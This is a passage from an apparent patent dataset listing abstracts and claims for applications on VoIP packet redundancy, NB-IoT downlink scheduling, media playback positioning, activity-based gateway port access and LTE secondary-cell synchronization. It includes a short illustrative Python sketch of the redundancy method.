receiving voice data and encoding the voice data as a voice data payload; packetizing the voice data payload to generate a voice data packet including the voice data payload, the voice data packet further including at least one redundant payload selected from a set of previous voice data payloads; determining whether the encoded voice data payload is a critical payload or non-critical payload by classifying the received voice data as voiced or unvoiced, wherein, if at least a portion of the voice data is classified as unvoiced, the encoded voice data payload is determined to be a critical payload; adding the encoded voice data payload to the set of previous voice data payloads for inclusion as a redundant payload in subsequent voice data packets if the encoded voice data payload is determined to be a critical payload; and forwarding the voice data packet for transmission over the network. 2. The method of claim 1, further comprising: receiving a network statistics report and estimating a redundancy value based on the network statistics report, and wherein the number of redundant payloads is based on the redundancy value. 3. The method of claim 1, wherein, if the voice data is classified as voiced, the determining further comprises calculating a waveform similarity factor for the received voice data. 4. The method of claim 3, wherein calculating the waveform similarity factor comprises deriving a pitch for the voice data. 5. The method of claim 3, wherein calculating the waveform similarity factor comprises setting the waveform similarity factor to zero if the voice data is determined to be noise. 6. The method of claim 3, wherein, if the voice data is classified as voiced, the determining further comprises: calculating a variance value using the waveform similarity factor and comparing the variance value to a threshold value to determine whether the voice data payload is a critical payload. 7. 
The method of claim 1, wherein, if the voice data payload is determined to be a non-critical payload, then the voice data payload is not added to the set of previous voice data payloads. 8. The method of claim 1, wherein the packetizing further comprises determining that one or more preceding voice data payloads were selectively dropped prior to transmission over the network, and adding one or more of the dropped preceding voice data payloads to the voice data packet. 9. The method of claim 1, further comprising, subsequent to forwarding the voice data packet: determining whether to drop the voice data payload without transmitting it over the network. 10. The method of claim 2, wherein the network statistics report comprises at least one of: out-of-order packet statistics for packets previously sent for transmission over the network; and lost packet statistics for packets previously sent for transmission over the network. 11. A system for transmitting voice data packets with redundancy in a network, the system comprising:
an encoder configured to receive voice data and generate an encoded voice data payload from the voice data; a packetizer configured to packetize the encoded voice data payload to generate a voice data packet including the encoded voice data payload, the voice data packet further comprising at least one redundant payload selected from a set of previous voice data payloads; a packet identifier configured to determine whether the encoded voice data payload is a critical payload or non-critical payload by classifying the received voice data as voiced or unvoiced, wherein, if at least a portion of the voice data is classified as unvoiced, the encoded voice data payload is determined to be a critical payload, and, if the voice data payload is determined to be a critical payload, then the encoded voice data payload is added to the set of previous voice data payloads for inclusion as a redundant payload in subsequent voice data packets; and a transmitter configured to forward the voice data packet for transmission over the network. 12. The system of claim 11, further comprising: a network report receiver configured to receive a network statistics report; and a redundancy estimator configured to estimate a redundancy value based on the network statistics report, wherein the number of redundant payloads is based on the redundancy value. 13. The system of claim 11, wherein, if the voice data is classified as voiced, the packet identifier is configured to calculate a waveform similarity factor for the received voice data. 14. The system of claim 13, wherein the packet identifier calculates the waveform similarity factor based on a pitch of the voice data, and sets the waveform similarity factor to zero if the voice data is determined to be noise. 15. 
The system of claim 13, wherein, if the voice data is classified as voiced, the packet identifier is configured to calculate a variance value using the waveform similarity factor and compare the variance value to a threshold value to determine whether the voice data payload is a critical payload. 16. The system of claim 11, wherein, if the voice data payload is determined to be a non-critical payload, then the voice data payload is not added to the set of previous voice data payloads. 17. The system of claim 11, wherein the packetizer is further configured to determine that one or more preceding voice data payloads were selectively dropped prior to transmission over the network, and add one or more of the dropped preceding voice data payloads to the voice data packet. 18. The system of claim 11, wherein the transmitter is further configured to determine whether to drop the voice data payload, subsequent to forwarding the voice data packet. 19. The system of claim 11, wherein the network statistics report comprises at least one of: out-of-order packet statistics for packets previously sent by the transmitter; and lost packet statistics for packets previously sent by the transmitter. 20. A non-transitory computer readable storage medium having stored therein computer-executable instructions that cause a computer to:
receive voice data and encode the voice data as a voice data payload; packetize the voice data payload to generate a voice data packet including the voice data payload, the voice data packet further including at least one redundant payload selected from a set of previous voice data payloads; determine whether the voice data payload is a critical payload or non-critical payload by classifying the received voice data as voiced or unvoiced, wherein, if at least a portion of the voice data is classified as unvoiced, the voice data payload is determined to be a critical payload; add the voice data payload to the set of previous voice data payloads for inclusion as the redundant payload in subsequent voice data packets if the voice data payload is determined to be a critical payload; and forward the voice data packet for transmission over the network. | 2,400 |
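The adaptive-redundancy packetization of claim 1 of application 14,485,482 above can be sketched as follows. The energy-threshold stand-in for voiced/unvoiced classification and the fixed redundancy depth are assumptions, not the filing's algorithm: a payload judged critical (containing an unvoiced portion) joins the set of previous payloads carried as redundancy in subsequent packets.

```python
from collections import deque

class Packetizer:
    """Hedged sketch of claim 1's packetizer; details are illustrative."""
    def __init__(self, redundancy=2):
        self.redundancy = redundancy     # number of redundant payloads per packet
        self.critical = deque(maxlen=8)  # set of previous critical payloads

    def is_critical(self, samples, threshold=0.3):
        # Toy stand-in: treat low short-term energy as an unvoiced portion,
        # which per the claim makes the payload critical.
        energy = sum(s * s for s in samples) / len(samples)
        return energy < threshold

    def packetize(self, payload, samples):
        # Packet carries the current payload plus redundant prior payloads.
        packet = {"payload": payload,
                  "redundant": list(self.critical)[-self.redundancy:]}
        if self.is_critical(samples):
            # Critical payloads feed redundancy for subsequent packets.
            self.critical.append(payload)
        return packet

p = Packetizer(redundancy=2)
pkt1 = p.packetize(b"frame1", [0.1, 0.1, 0.1])  # low energy -> critical
pkt2 = p.packetize(b"frame2", [0.9, 0.9, 0.9])  # voiced, non-critical
```

In the claimed system the redundancy depth would instead be estimated from a network statistics report (claim 2); here it is fixed for brevity.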
9,170 | 9,170 | 16,275,866 | 2,467 | A method in a network node includes communicating, over a narrowband Internet of Things downlink, a first message to a first wireless device during repetition periods of at least a first time frame and a second time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH). Each time frame of the plurality of time frames includes a repetition period and a gap. The method also includes communicating a second message to a second wireless device during a gap of the first time frame. | 1. A method in a network node comprising:
communicating, over a narrowband Internet of Things downlink, a first message to a first wireless device during repetition periods of at least a first time frame and a second time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH), each time frame of the plurality of time frames comprising a repetition period and a gap; and communicating a second message to a second wireless device during a gap of the first time frame. 2. The method of claim 1, further comprising communicating a third message to a third wireless device during a gap of the second time frame. 3. The method of claim 2, further comprising:
communicating a fourth message to a fourth wireless device during a second repetition period of the first time frame; and communicating the fourth message to the fourth wireless device during a second repetition period of the second time frame. 4. The method of claim 1, further comprising communicating a third message to a third device during the repetition period of the first time frame. 5. The method of claim 1, further comprising communicating a third message to a third wireless device during the gap of the first time frame. 6. The method of claim 5, wherein:
the repetition period of the first time frame comprises a first period and a second period, the first period being longer than the second period; the first message is communicated during the first period; and the third message is communicated during the second period. 7. The method of claim 5, further comprising communicating a fourth message to a fourth wireless device during the repetition period of the first time frame. 8. The method of claim 7, wherein:
the repetition period of the first time frame comprises a first period, a second period, and a third period, the first period being longer than the second period and the second period being longer than the third period; the first message is communicated during the first period; the third message is communicated during the second period; and the fourth message is communicated during the third period. 9. The method of claim 1, wherein the method is performed at an eNodeB. 10. The method of claim 1, further comprising assigning the first wireless device to a coverage level based on a number of repeated transmissions communicated before an acknowledgment is received from the first wireless device. 11. The method of claim 1, wherein a number of repeated transmissions to reach the first wireless device is greater than a number of repeated transmissions to reach the second wireless device. 12. A network node comprising:
a memory; and processing circuitry communicatively coupled to the memory, the processing circuitry configured to: communicate, over a narrowband Internet of Things downlink, a first message to a first wireless device during repetition periods of at least a first time frame and a second time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH), each time frame of the plurality of time frames comprising a repetition period and a gap; and communicate a second message to a second wireless device during a gap of the first time frame. 13-22. (canceled) 23. A wireless device comprising:
a memory; and processing circuitry communicatively coupled to the memory, the processing circuitry configured to: receive, over a narrowband Internet of Things downlink, a configuration indicating a subframe in which a communication over a narrowband physical downlink control channel (NB-PDCCH) is scheduled to be communicated; receive the communication over the NB-PDCCH in the subframe indicated by the configuration; and decode the communication. 24. The wireless device of claim 23, wherein the processing circuitry is further configured to receive a message during a repetition period of a first time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or the NB-PDSCH, each time frame of the plurality of time frames comprising a repetition period and a gap. 25. The wireless device of claim 24, wherein at least a time frame of the plurality of time frames is aligned with the subframe. 26. The wireless device of claim 24, wherein the processing circuitry is further configured to receive a message during a gap of a first time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH), each time frame of the plurality of time frames comprising a repetition period and a gap. 27. The wireless device of claim 23, wherein the configuration is communicated by an eNodeB. 28. The wireless device of claim 23, wherein the wireless device is assigned to a coverage level based on a number of repeated transmissions communicated before the wireless device communicates an acknowledgment. 29. The wireless device of claim 23, wherein a number of repeated transmissions to reach the wireless device is greater than a number of repeated transmissions to reach a second wireless device assigned to a different coverage level than the wireless device. 30. A method comprising:
receiving, over a narrowband Internet of Things downlink, a configuration indicating a subframe in which a communication over a narrowband physical downlink control channel (NB-PDCCH) is scheduled to be communicated; receiving the communication over the NB-PDCCH in the subframe indicated by the configuration; and decoding the communication. 31-36. (canceled) | A method in a network node includes communicating, over a narrowband Internet of Things downlink, a first message to a first wireless device during repetition periods of at least a first time frame and a second time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH). Each time frame of the plurality of time frames includes a repetition period and a gap. The method also includes communicating a second message to a second wireless device during a gap of the first time frame. 1. A method in a network node comprising:
communicating, over a narrowband Internet of Things downlink, a first message to a first wireless device during repetition periods of at least a first time frame and a second time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH), each time frame of the plurality of time frames comprising a repetition period and a gap; and communicating a second message to a second wireless device during a gap of the first time frame. 2. The method of claim 1, further comprising communicating a third message to a third wireless device during a gap of the second time frame. 3. The method of claim 2, further comprising:
communicating a fourth message to a fourth wireless device during a second repetition period of the first time frame; and communicating the fourth message to the fourth wireless device during a second repetition period of the second time frame. 4. The method of claim 1, further comprising communicating a third message to a third wireless device during the repetition period of the first time frame. 5. The method of claim 1, further comprising communicating a third message to a third wireless device during the gap of the first time frame. 6. The method of claim 5, wherein:
the repetition period of the first time frame comprises a first period and a second period; the first period is longer than the second period; the first message is communicated during the first period; and the third message is communicated during the second period. 7. The method of claim 5, further comprising communicating a fourth message to a fourth wireless device during the repetition period of the first time frame. 8. The method of claim 7, wherein:
the repetition period of the first time frame comprises a first period, a second period, and a third period; the first period is longer than the second period; the second period is longer than the third period; the first message is communicated during the first period; the third message is communicated during the second period; and the fourth message is communicated during the third period. 9. The method of claim 1, wherein the method is performed at an eNodeB. 10. The method of claim 1, further comprising assigning the first wireless device to a coverage level based on a number of repeated transmissions communicated before an acknowledgment is received from the first wireless device. 11. The method of claim 1, wherein a number of repeated transmissions to reach the first wireless device is greater than a number of repeated transmissions to reach the second wireless device. 12. A network node comprising:
a memory; and processing circuitry communicatively coupled to the memory, the processing circuitry configured to: communicate, over a narrowband Internet of Things downlink, a first message to a first wireless device during repetition periods of at least a first time frame and a second time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH), each time frame of the plurality of time frames comprising a repetition period and a gap; and communicate a second message to a second wireless device during a gap of the first time frame. 13-22. (canceled) 23. A wireless device comprising:
a memory; and processing circuitry communicatively coupled to the memory, the processing circuitry configured to: receive, over a narrowband Internet of Things downlink, a configuration indicating a subframe in which a communication over a narrowband physical downlink control channel (NB-PDCCH) is scheduled to be communicated; receive the communication over the NB-PDCCH in the subframe indicated by the configuration; and decode the communication. 24. The wireless device of claim 23, wherein the processing circuitry is further configured to receive a message during a repetition period of a first time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or the NB-PDSCH, each time frame of the plurality of time frames comprising a repetition period and a gap. 25. The wireless device of claim 24, wherein at least a time frame of the plurality of time frames is aligned with the subframe. 26. The wireless device of claim 24, wherein the processing circuitry is further configured to receive a message during a gap of a first time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH), each time frame of the plurality of time frames comprising a repetition period and a gap. 27. The wireless device of claim 23, wherein the configuration is communicated by an eNodeB. 28. The wireless device of claim 23, wherein the wireless device is assigned to a coverage level based on a number of repeated transmissions communicated before the wireless device communicates an acknowledgment. 29. The wireless device of claim 23, wherein a number of repeated transmissions to reach the wireless device is greater than a number of repeated transmissions to reach a second wireless device assigned to a different coverage level than the wireless device. 30. A method comprising:
receiving, over a narrowband Internet of Things downlink, a configuration indicating a subframe in which a communication over a narrowband physical downlink control channel (NB-PDCCH) is scheduled to be communicated; receiving the communication over the NB-PDCCH in the subframe indicated by the configuration; and decoding the communication. 31-36. (canceled)
9,171 | 9,171 | 16,445,679 | 2,484 | Systems and methods to position and play content. The system renders a first content segment to an output device at an accelerated speed for the first content segment. Next, the system receives a request to play the first content segment from the beginning of the first content segment at a normal speed for the first content segment. Next, the system automatically positions to the beginning of the first content segment based on position information that is associated with the first content segment. Finally, the system renders the first content segment to the output device from the beginning of the first content segment at a normal speed for the first content segment. | 1. A method comprising:
causing presentation of media content at a first combination of direction and speed, the media content including content sequences among which a first sequence includes a reference point; during presentation of the first sequence at the first combination of direction and speed, detecting a request to present the first sequence at a second combination of direction and speed; responsive to the request, causing presentation of the first sequence from the reference point at the second combination of direction and speed and suspending the presentation of the media content at the first combination of direction and speed at a suspension point within the first sequence but different from the reference point; and restarting the suspended presentation of the media content after the caused presentation of the first sequence at the second combination of direction and speed. 2. The method of claim 1, wherein:
the content sequences in the media content include a second sequence; and the restarting of the suspended presentation of the media content includes causing presentation of the second sequence at the first combination of direction and speed. 3. The method of claim 1, wherein:
the restarting of the suspended presentation of the media content is responsive to completion of the caused presentation of the first sequence at the second combination of direction and speed. 4. The method of claim 1, wherein:
the reference point in the first sequence is a beginning of the first sequence. 5. The method of claim 1, wherein:
the first combination of direction and speed and the second combination of direction and speed specify different directions of playback. 6. The method of claim 1, wherein:
the first combination of direction and speed and the second combination of direction and speed specify different speeds of playback. 7. The method of claim 1, wherein:
the first combination of direction and speed and the second combination of direction and speed specify different speeds of playback in a same direction of playback. 8. The method of claim 1, further comprising:
causing presentation of an image contemporaneously with the presentation of the first sequence at the first combination of direction and speed. 9. The method of claim 8, wherein:
the image depicts a scene in the first sequence. 10. The method of claim 8, wherein:
the image indicates a subject of the first sequence. 11. A method comprising:
causing presentation of first content at a first combination of direction and speed, the first content including content sequences among which a first sequence includes a reference point; during presentation of the first sequence at the first combination of direction and speed, detecting a request to present second content at a second combination of direction and speed, the second content including a version of the first sequence; responsive to the request, causing presentation of the second content from its beginning at the second combination of direction and speed and suspending the presentation of the first content at the first combination of direction and speed at a suspension point within the first sequence but different from the reference point; and restarting the suspended presentation of the first content after the caused presentation of the second content at the second combination of direction and speed. 12. The method of claim 11, wherein:
the content sequences in the first content include a second sequence; and the restarting of the suspended presentation of the first content includes causing presentation of the second sequence at the first combination of direction and speed. 13. The method of claim 11, wherein:
the restarting of the suspended presentation of the first content is responsive to completion of the caused presentation of the second content at the second combination of direction and speed. 14. The method of claim 11, wherein:
the second content includes a longer version of the first content. 15. The method of claim 11, wherein:
the second content includes a shorter version of the first content. 16. The method of claim 11, wherein:
the second content includes an interactive application. 17. A system comprising:
one or more processors; a render module executable by the one or more processors and configured to cause presentation of first content at a first combination of direction and speed, the first content including content sequences among which a first sequence includes a reference point; and a request module executable by the one or more processors and configured to, during presentation of the first sequence at the first combination of direction and speed, detect a request to present second content at a second combination of direction and speed, the second content including a version of the first sequence; the render module being further configured to, responsive to the request, cause presentation of the second content from its beginning at the second combination of direction and speed and suspend the presentation of the first content at the first combination of direction and speed at a suspension point within the first sequence but different from the reference point; and the render module being further configured to restart the suspended presentation of the first content after the caused presentation of the second content at the second combination of direction and speed. 18. The system of claim 17, wherein:
the render module is configured to restart the suspended presentation of the first content in response to completion of the caused presentation of the second content at the second combination of direction and speed. 19. The system of claim 17, wherein:
the second content includes a version of the first content. 20. The system of claim 17, wherein:
the second content includes an interactive application. | Systems and methods to position and play content. The system renders a first content segment to an output device at an accelerated speed for the first content segment. Next, the system receives a request to play the first content segment from the beginning of the first content segment at a normal speed for the first content segment. Next, the system automatically positions to the beginning of the first content segment based on position information that is associated with the first content segment. Finally, the system renders the first content segment to the output device from the beginning of the first content segment at a normal speed for the first content segment. 1. A method comprising:
causing presentation of media content at a first combination of direction and speed, the media content including content sequences among which a first sequence includes a reference point; during presentation of the first sequence at the first combination of direction and speed, detecting a request to present the first sequence at a second combination of direction and speed; responsive to the request, causing presentation of the first sequence from the reference point at the second combination of direction and speed and suspending the presentation of the media content at the first combination of direction and speed at a suspension point within the first sequence but different from the reference point; and restarting the suspended presentation of the media content after the caused presentation of the first sequence at the second combination of direction and speed. 2. The method of claim 1, wherein:
the content sequences in the media content include a second sequence; and the restarting of the suspended presentation of the media content includes causing presentation of the second sequence at the first combination of direction and speed. 3. The method of claim 1, wherein:
the restarting of the suspended presentation of the media content is responsive to completion of the caused presentation of the first sequence at the second combination of direction and speed. 4. The method of claim 1, wherein:
the reference point in the first sequence is a beginning of the first sequence. 5. The method of claim 1, wherein:
the first combination of direction and speed and the second combination of direction and speed specify different directions of playback. 6. The method of claim 1, wherein:
the first combination of direction and speed and the second combination of direction and speed specify different speeds of playback. 7. The method of claim 1, wherein:
the first combination of direction and speed and the second combination of direction and speed specify different speeds of playback in a same direction of playback. 8. The method of claim 1, further comprising:
causing presentation of an image contemporaneously with the presentation of the first sequence at the first combination of direction and speed. 9. The method of claim 8, wherein:
the image depicts a scene in the first sequence. 10. The method of claim 8, wherein:
the image indicates a subject of the first sequence. 11. A method comprising:
causing presentation of first content at a first combination of direction and speed, the first content including content sequences among which a first sequence includes a reference point; during presentation of the first sequence at the first combination of direction and speed, detecting a request to present second content at a second combination of direction and speed, the second content including a version of the first sequence; responsive to the request, causing presentation of the second content from its beginning at the second combination of direction and speed and suspending the presentation of the first content at the first combination of direction and speed at a suspension point within the first sequence but different from the reference point; and restarting the suspended presentation of the first content after the caused presentation of the second content at the second combination of direction and speed. 12. The method of claim 11, wherein:
the content sequences in the first content include a second sequence; and the restarting of the suspended presentation of the first content includes causing presentation of the second sequence at the first combination of direction and speed. 13. The method of claim 11, wherein:
the restarting of the suspended presentation of the first content is responsive to completion of the caused presentation of the second content at the second combination of direction and speed. 14. The method of claim 11, wherein:
the second content includes a longer version of the first content. 15. The method of claim 11, wherein:
the second content includes a shorter version of the first content. 16. The method of claim 11, wherein:
the second content includes an interactive application. 17. A system comprising:
one or more processors; a render module executable by the one or more processors and configured to cause presentation of first content at a first combination of direction and speed, the first content including content sequences among which a first sequence includes a reference point; and a request module executable by the one or more processors and configured to, during presentation of the first sequence at the first combination of direction and speed, detect a request to present second content at a second combination of direction and speed, the second content including a version of the first sequence; the render module being further configured to, responsive to the request, cause presentation of the second content from its beginning at the second combination of direction and speed and suspend the presentation of the first content at the first combination of direction and speed at a suspension point within the first sequence but different from the reference point; and the render module being further configured to restart the suspended presentation of the first content after the caused presentation of the second content at the second combination of direction and speed. 18. The system of claim 17, wherein:
the render module is configured to restart the suspended presentation of the first content in response to completion of the caused presentation of the second content at the second combination of direction and speed. 19. The system of claim 17, wherein:
the second content includes a version of the first content. 20. The system of claim 17, wherein:
the second content includes an interactive application. | 2,400 |
9,172 | 9,172 | 15,485,328 | 2,433 | Methods, devices and program products are provided for collecting activity data concerning a local environment from a device associated with the local environment. The method determines, using a processor, an activity state associated with a local environment based on the activity data collected by the device. The method manages, using the processor, an access setting associated with a network port of a network gateway into the local environment based on the activity state. | 1. A method, comprising:
collecting activity data concerning a local environment from a device associated with the local environment; determining, using a processor, an activity state associated with a local environment based on the activity data collected by the device; and managing, using the processor, an access setting associated with a network port of a network gateway into the local environment based on the activity state. 2. The method of claim 1, wherein the managing further comprises changing the access setting between first and second access levels based on the activity data. 3. The method of claim 1, wherein the device represents a sensor to monitor at least a portion of the local environment and provide, as the activity data, an indication of whether one or more individuals are present in the local environment. 4. The method of claim 1, wherein the device represents a portable device to provide, as the activity data, sleep state information for a user associated with the wearable device. 5. The method of claim 1, wherein the managing further comprises disabling the network port when the activity state corresponds to a sleep state. 6. The method of claim 1, further comprising accessing one or more rules that define the access setting associated with the network port based on the activity state. 7. The method of claim 6, further comprising receiving incoming data traffic from an external source, the data traffic directed to the network port of the network gateway into the local environment, and determining whether to block the data traffic based on the access setting. 8. The method of claim 1, wherein the network gateway includes first and second ports, the managing comprising individually managing the first and second ports to have different access settings based on the activity state. 9. Apparatus, comprising:
a network port into a local environment, the network port to receive data traffic directed to one or more computing devices within a local environment; memory storing program instructions; and a processor, in response to execution of the program instructions, to perform the following:
collect activity data concerning the local environment;
determine an activity state associated with a local environment based on the activity data collected by the device; and
manage an access setting for the network port into the local environment based on the activity state. 10. The apparatus of claim 9, further comprising a wireless router, wherein the network port represents a network port on the wireless router. 11. The apparatus of claim 9, wherein the processor, in response to execution of the program instructions, routes incoming data traffic through the network port to a predetermined computing device within the local environment. 12. The apparatus of claim 9, wherein the device represents a portable device that provides, as the activity data, sleep state information for a user associated with the wearable device. 13. The apparatus of claim 9, wherein the device represents a sensor to monitor at least a portion of the local environment and provide, as the activity data, an indication of whether one or more individuals are present in the local environment. 14. The apparatus of claim 9, wherein the processor, in response to execution of the program instructions, changes the access setting between first and second access levels based on the activity data. 15. The apparatus of claim 9, wherein the processor, in response to execution of the program instructions, disables the network port when the activity state corresponds to a sleep state. 16. The apparatus of claim 9, wherein the memory stores one or more rules that define the access setting for the network port based on the activity state. 17. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to:
collect activity data concerning a local environment from a device associated with the local environment; determine, using a processor, an activity state associated with a local environment based on the activity data collected by the device; and manage, using the processor, an access setting associated with a network port of a network gateway into the local environment based on the activity state. 18. The computer program product of claim 17, wherein the manage further comprises to change the access setting between first and second access levels based on the activity data. 19. The computer program product of claim 17, wherein the device represents a portable device to provide, as the activity data, sleep state information for a user associated with the wearable device. 20. The computer program product of claim 17, wherein the manage further comprises to disable the network port when the activity state corresponds to a sleep state. | Methods, devices and program products are provided for collecting activity data concerning a local environment from a device associated with the local environment. The method determines, using a processor, an activity state associated with a local environment based on the activity data collected by the device. The method manages, using the processor, an access setting associated with a network port of a network gateway into the local environment based on the activity state. 1. A method, comprising:
collecting activity data concerning a local environment from a device associated with the local environment; determining, using a processor, an activity state associated with a local environment based on the activity data collected by the device; and managing, using the processor, an access setting associated with a network port of a network gateway into the local environment based on the activity state. 2. The method of claim 1, wherein the managing further comprises changing the access setting between first and second access levels based on the activity data. 3. The method of claim 1, wherein the device represents a sensor to monitor at least a portion of the local environment and provide, as the activity data, an indication of whether one or more individuals are present in the local environment. 4. The method of claim 1, wherein the device represents a portable device to provide, as the activity data, sleep state information for a user associated with the wearable device. 5. The method of claim 1, wherein the managing further comprises disabling the network port when the activity state corresponds to a sleep state. 6. The method of claim 1, further comprising accessing one or more rules that define the access setting associated with the network port based on the activity state. 7. The method of claim 6, further comprising receiving incoming data traffic from an external source, the data traffic directed to the network port of the network gateway into the local environment, and determining whether to block the data traffic based on the access setting. 8. The method of claim 1, wherein the network gateway includes first and second ports, the managing comprising individually managing the first and second ports to have different access settings based on the activity state. 9. Apparatus, comprising:
a network port into a local environment, the network port to receive data traffic directed to one or more computing devices within a local environment; memory storing program instructions; and a processor, in response to execution of the program instructions, to perform the following:
collect activity data concerning the local environment;
determine an activity state associated with a local environment based on the activity data collected by the device; and
manage an access setting for the network port into the local environment based on the activity state. 10. The apparatus of claim 9, further comprising a wireless router, wherein the network port represents a network port on the wireless router. 11. The apparatus of claim 9, wherein the processor, in response to execution of the program instructions, routes incoming data traffic through the network port to a predetermined computing device within the local environment. 12. The apparatus of claim 9, wherein the device represents a portable device that provides, as the activity data, sleep state information for a user associated with the wearable device. 13. The apparatus of claim 9, wherein the device represents a sensor to monitor at least a portion of the local environment and provide, as the activity data, an indication of whether one or more individuals are present in the local environment. 14. The apparatus of claim 9, wherein the processor, in response to execution of the program instructions, changes the access setting between first and second access levels based on the activity data. 15. The apparatus of claim 9, wherein the processor, in response to execution of the program instructions, disables the network port when the activity state corresponds to a sleep state. 16. The apparatus of claim 9, wherein the memory stores one or more rules that define the access setting for the network port based on the activity state. 17. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to:
collect activity data concerning a local environment from a device associated with the local environment; determine, using a processor, an activity state associated with a local environment based on the activity data collected by the device; and manage, using the processor, an access setting associated with a network port of a network gateway into the local environment based on the activity state. 18. The computer program product of claim 17, wherein the manage further comprises to change the access setting between first and second access levels based on the activity data. 19. The computer program product of claim 17, wherein the device represents a portable device to provide, as the activity data, sleep state information for a user associated with the wearable device. 20. The computer program product of claim 17, wherein the manage further comprises to disable the network port when the activity state corresponds to a sleep state. | 2,400 |
9,173 | 9,173 | 14,009,913 | 2,478 | Embodiments provide a method for initializing a secondary cell in a cellular communication system. The method may comprise: receiving from a base station a Radio Resource Control RRC configuration request for the secondary cell to perform a RRC configuration; and in response to receiving the RRC configuration request, performing uplink synchronization with the base station in the secondary cell. | 1. A method for initializing a secondary cell in a cellular communication system, comprising:
receiving from a base station a Radio Resource Control RRC configuration request for the secondary cell to perform the RRC configuration; and performing, in response to receiving the RRC configuration request, uplink synchronization with the base station in the secondary cell. 2. The method according to claim 1, wherein performing, in response to receiving the RRC configuration request, uplink synchronization with the base station in the secondary cell comprises:
receiving a PDCCH order signaling from the base station; and performing uplink synchronization with the base station in the secondary cell based on the PDCCH order signaling. 3. The method according to claim 2, wherein performing uplink synchronization with the base station in the secondary cell based on the PDCCH order signaling comprises:
identifying different preambles reserved by the PDCCH order signaling for different secondary cells to determine the secondary cells for uplink synchronization; or identifying a field of CIF in the PDCCH order signaling to determine the secondary cells for uplink synchronization; or determining, based on the PDCCH order signaling, whether to perform uplink synchronization merely for specific secondary cells or for all secondary cells that have not performed the uplink synchronization. 4. The method according to claim 1, wherein performing uplink synchronization with the base station in the secondary cell comprises:
determining whether to perform the uplink synchronization with the base station in the secondary cell based on the RRC configuration request. 5. The method according to claim 1, further comprising:
determining whether a dedicated preamble has been set in the RRC configuration request; in response to determining that a dedicated preamble has been set, performing a non-contention uplink synchronization process; and in response to determining that no dedicated preamble has been set, performing a contention uplink synchronization process. 6. The method according to claim 1, further comprising:
sending to the base station a message that a RRC configuration is completed, wherein the message is sent independent of performing the uplink synchronization. 7. The method according to claim 1, further comprising:
after performing the uplink synchronization, sending to the base station a message that a RRC configuration is completed. 8. The method according to claim 1, wherein performing uplink synchronization with the base station in the secondary cell comprises:
determining, based on the RRC configuration request, whether to use Timing Advance TA information of a secondary cell or primary cell which has been configured; and in response to determining not to use Timing Advance TA information of a secondary cell which has been configured, performing a random access process for the secondary cell. 9. The method according to claim 1, wherein performing uplink synchronization with the base station in the secondary cell comprises:
determining whether it is necessary to configure a plurality of secondary cells based on the RRC configuration request; in response to determining that it is necessary to configure a plurality of secondary cells, determining whether the same TA information is used for the plurality of secondary cells; if the same TA information is used for the plurality of secondary cells, performing random access processes simultaneously or one by one for each of the plurality of secondary cells, and obtaining TA information based on the first successfully-performed random access process for use in uplink transmission of each secondary cell; and if the same TA information is not used for the plurality of secondary cells, performing random access processes simultaneously or one by one for each of the plurality of secondary cells to obtain TA information corresponding to each secondary cell for use in uplink transmission of the each secondary cell. 10. The method according to claim 1, wherein after receiving the RRC configuration request, if a user equipment fails to perform uplink synchronization with the base station in the secondary cell or the uplink synchronization fails, contents for the secondary cell in cell active MAC signaling are ignored and/or downlink measurement and report for the secondary cell are not performed. 11. A method for initializing a secondary cell in a cellular communication system, comprising:
sending to a user equipment a Radio Resource Control RRC configuration request so that the user equipment performs a RRC configuration and performs uplink synchronization between the user equipment and a base station in the secondary cell. 12. The method according to claim 11, further comprising:
sending to the user equipment a PDCCH order signaling so that the uplink synchronization between the user equipment and the base station in the secondary cell is performed. 13. The method according to claim 11, wherein sending to the user equipment a PDCCH order signaling comprises:
reserving different preambles in the PDCCH order signaling for different secondary cells to identify a secondary cell to perform the uplink synchronization; or setting a field of CIF in the PDCCH order signaling to identify the secondary cells for uplink synchronization; or setting the PDCCH order signaling to indicate whether to perform the uplink synchronization merely for specific secondary cells or for all secondary cells that have not performed the uplink synchronization. 14.-19. (canceled) 20. A user equipment for initializing a secondary cell in a cellular communication system, comprising:
receiving means configured to receive from a base station a Radio Resource Control RRC configuration request for the secondary cell to perform the RRC configuration; and synchronizing means configured to perform, in response to receiving the RRC configuration request, uplink synchronization with the base station in the secondary cell. 21.-29. (canceled) 30. A base station for initializing a secondary cell in a cellular communication system, comprising sending means, wherein the sending means comprises:
an RRC configuration request sending unit configured to send a Radio Resource Control RRC configuration request to a user equipment so that the user equipment performs a RRC configuration and performs uplink synchronization between the user equipment and a base station in the secondary cell. 31.-38. (canceled) | Embodiments provide a method for initializing a secondary cell in a cellular communication system. The method may comprise: receiving from a base station a Radio Resource Control RRC configuration request for the secondary cell to perform a RRC configuration; and in response to receiving the RRC configuration request, performing uplink synchronization with the base station in the secondary cell.1. A method for initializing a secondary cell in a cellular communication system, comprising:
receiving from a base station a Radio Resource Control RRC configuration request for the secondary cell to perform the RRC configuration; and performing, in response to receiving the RRC configuration request, uplink synchronization with the base station in the secondary cell. 2. The method according to claim 1, wherein performing, in response to receiving the RRC configuration request, uplink synchronization with the base station in the secondary cell comprises:
receiving a PDCCH order signaling from the base station; and performing uplink synchronization with the base station in the secondary cell based on the PDCCH order signaling. 3. The method according to claim 2, wherein performing uplink synchronization with the base station in the secondary cell based on the PDCCH order signaling comprises:
